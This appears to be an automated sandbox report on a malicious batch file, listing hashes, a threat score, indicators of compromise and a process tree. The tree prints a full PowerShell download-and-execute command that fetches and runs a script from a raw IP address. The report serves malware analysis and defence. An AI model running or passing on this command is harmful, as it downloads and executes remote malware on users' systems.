8178b2a273ccd3ec4e01c78beeabb8b306e6851906b9581eff43d3af65cb72cb

Analysis

Target

6ebe9b72866bb759c8fb8b43c6691c55.bat
Size

217B
MD5

9a910f1611f357e048f8f5ca83a09740
SHA1

ca3e718abf686be0e827824a117c276ebab717d9
SHA256

8178b2a273ccd3ec4e01c78beeabb8b306e6851906b9581eff43d3af65cb72cb
SHA512

279acdb19eefff654a3828abdb8e37ac8d0a937ba8908e8465f2daefb88cfade810fc0ff18c2dd43288583a5b48a634cd4813fb087a837e2331190bd3470cb01

Score

10^/10

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/6ebe9b72866bb759c8fb8b43c6691c55

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1008 wrote to memory of 4028	1008	cmd.exe	67
PID 1008 wrote to memory of 4028	1008	cmd.exe	67
PID 1008 wrote to memory of 4028	1008	cmd.exe	67

Program crash 1 IoCs

pid	pid_target	Process	procid_target
808	4028	WerFault.exe	67

Suspicious use of AdjustPrivilegeToken 3 IoCs

Suspicious behavior: EnumeratesProcesses 13 IoCs

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\6ebe9b72866bb759c8fb8b43c6691c55.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1008
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/6ebe9b72866bb759c8fb8b43c6691c55');Invoke-RDYJJFERDU;Start-Sleep -s 10000"
  2⤵
  PID:4028
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4028 -s 704
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    PID:808

memory/808-1-0x0000000004040000-0x0000000004041000-memory.dmp

Filesize
4KB

Download
memory/808-9-0x00000000047F0000-0x00000000047F1000-memory.dmp

Filesize
4KB

Download
memory/808-46-0x0000000004BF0000-0x0000000004BF1000-memory.dmp

Filesize
4KB

Download